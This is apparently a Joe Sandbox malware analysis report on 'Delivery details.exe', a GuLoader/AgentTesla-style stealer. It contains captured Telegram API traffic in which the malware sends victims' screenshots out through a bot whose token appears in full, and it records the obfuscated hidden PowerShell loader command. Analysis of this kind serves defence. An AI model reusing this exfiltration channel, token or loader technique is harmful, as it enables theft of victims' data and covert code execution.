2024-03-15 11:38:00 UTC	15447	OUT	Data Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61 Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
2024-03-15 11:38:00 UTC	1603	OUT	Data Raw: aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 Data Ascii: B$}<B$}<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,
2024-03-15 11:38:00 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 2d 2d 0d 0a Data Ascii: -----------------------------8dc531643bd24a9--
2024-03-15 11:38:01 UTC	1493	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 15 Mar 2024 11:38:01 GMT Content-Type: application/json Content-Length: 1104 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":163,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502681,"document":{"file_name":"user-302494 2024-04-02 13-10-27.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Nl9DMZ26DxPVcuvn5-gRM985CrFwAC9BEAAucMoFPuTsTKe9vv7wEAB20AAzQE","file_unique_id":"AQAD9BEAAucMoFNy","file_size":12486,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Nl9DMZ26DxPVcuvn5-gRM985CrFwAC9BEAAucMoFPuTsTKe9vv7wEAB20AAzQE","file_unique_id":"AQAD9BEAAucMoFNy","file_size":12486,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOjZfQzGdug8T1XLr5-foETPfOQqxcAAvQRAALnDKBT7k7Eynvb7-80BA","file_unique_id":"AgAD9BEAAucMoFM","file_size":66564},"caption":"New SC Recovered!\n\nTime: 04/02/2024 12:40:27\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49722	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:38:04 UTC	238	OUT	POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc44ecc148ce97 Host: api.telegram.org Content-Length: 67199 Expect: 100-continue
2024-03-15 11:38:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-15 11:38:05 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 32 3a 33 38 3a 30 32 0a 55 73 65 72 Data Ascii: -----------------------------8dc44ecc148ce97Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44ecc148ce97Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/15/2024 12:38:02User
2024-03-15 11:38:05 UTC	16355	OUT	Data Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2024-03-15 11:38:05 UTC	16355	OUT	Data Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94 Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW\|QEkKeMRQ*I5}~5W\|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
2024-03-15 11:38:05 UTC	16355	OUT	Data Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
2024-03-15 11:38:05 UTC	15447	OUT	Data Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61 Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
2024-03-15 11:38:05 UTC	1613	OUT	Data Raw: ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 04 ff 00 f1 ef 27 fb a7 f9 57 cf 35 f4 1c d3 44 60 90 09 10 92 a7 f8 87 a5 7c f9 57 13 39 85 6e 69 9e 24 9e ce c7 ec 17 36 b0 5f d9 e7 72 c3 70 b9 0a 7d 41 ed f8 56 1d 15 44 1b 9a 9f 89 27 bc b1 fb Data Ascii: \|??@QQT\|??@QQT\|??@QQT\|??@QQT\|??@QQT\|??@QQT\|??@QQT\|??@QQT\|??@'W5D`\|W9ni$6_rp}AVD'
2024-03-15 11:38:05 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 63 31 34 38 63 65 39 37 2d 2d 0d 0a Data Ascii: -----------------------------8dc44ecc148ce97--
2024-03-15 11:38:05 UTC	1493	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 15 Mar 2024 11:38:05 GMT Content-Type: application/json Content-Length: 1104 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":164,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502685,"document":{"file_name":"user-302494 2024-03-15 12-38-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Rl9DMdJXBTH1JY1D6AiVliaUb08AAC9REAAucMoFNerfxmJIFxGgEAB20AAzQE","file_unique_id":"AQAD9REAAucMoFNy","file_size":12491,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Rl9DMdJXBTH1JY1D6AiVliaUb08AAC9REAAucMoFNerfxmJIFxGgEAB20AAzQE","file_unique_id":"AQAD9REAAucMoFNy","file_size":12491,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOkZfQzHSVwUx9SWNQ-gIlZYmlG9PAAAvURAALnDKBTXq38ZiSBcRo0BA","file_unique_id":"AgAD9REAAucMoFM","file_size":66574},"caption":"New SC Recovered!\n\nTime: 03/15/2024 12:38:02\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Target ID:	0
Start time:	12:35:55
Start date:	15/03/2024
Path:	C:\Users\user\Desktop\Delivery details.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Delivery details.exe
Imagebase:	0x400000
File size:	881'136 bytes
MD5 hash:	78AC601A2F48BC5FC7C15EDB4C0FB9D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:35:56
Start date:	15/03/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
Imagebase:	0xc40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:35:56
Start date:	15/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:35:57
Start date:	15/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:36:22
Start date:	15/03/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\windows mail\wab.exe
Imagebase:	0x9c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.5%
Total number of Nodes:	1362
Total number of Limit Nodes:	33

Executed Functions

Function 00403489 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034AC
GetVersion.KERNEL32 ref: 004034B2
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
OleInitialize.OLE32(00000000), ref: 00403529
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Delivery details.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Delivery details.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EB
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403707
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
ExitProcess.KERNEL32 ref: 00403820
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403833
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403842
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040384D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Delivery details.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
OpenProcessToken.ADVAPI32(00000000), ref: 00403946
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
ExitProcess.KERNEL32 ref: 004039C6

Strings

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 004037DC
Low, xrefs: 00403701
.tmp, xrefs: 00403847
Error launching installer, xrefs: 004037B6
~nsu, xrefs: 0040382B
SeShutdownPrivilege, xrefs: 00403955
C:\Users\user\Desktop, xrefs: 00403852, 00403857, 00403884
UXTHEME, xrefs: 004034D9, 004034DE, 004034E4
TMP, xrefs: 0040371B
\Temp, xrefs: 004036E5
C:\Users\user\AppData\Roaming\akroterion\archmugwump, xrefs: 004036B1, 004037D1, 0040387B, 00403885
1033, xrefs: 0040372F
C:\Users\user\AppData\Local\Temp\, xrefs: 004036C3, 004036C8, 004036DE, 004036EA, 004036F9, 00403706, 00403712, 0040371A, 00403830, 00403841, 0040384C, 00403858, 00403865, 00403874, 00403925
TEMP, xrefs: 00403713
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00403560, 00403566, 0040375C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034A0
NSIS Error, xrefs: 0040354B

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Delivery details.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\akroterion\archmugwump$C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2881978681
Opcode ID: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
Opcode Fuzzy Hash: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004055B1
GetDlgItem.USER32(?,000003EE), ref: 004055C0
GetClientRect.USER32(?,?), ref: 004055FD
GetSystemMetrics.USER32(00000002), ref: 00405604
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
ShowWindow.USER32(?,00000008), ref: 004056A0
GetDlgItem.USER32(?,000003EC), ref: 004056C1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
GetDlgItem.USER32(?,000003F8), ref: 004055CF

Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

GetDlgItem.USER32(?,000003EC), ref: 00405713
CreateThread.KERNELBASE(00000000,00000000,Function_000054E7,00000000), ref: 00405721
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405728
ShowWindow.USER32(00000000), ref: 0040574C
ShowWindow.USER32(?,00000008), ref: 00405751
ShowWindow.USER32(00000008), ref: 0040579B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
CreatePopupMenu.USER32 ref: 004057E0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
GetWindowRect.USER32(?,?), ref: 00405814
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
OpenClipboard.USER32(00000000), ref: 00405875
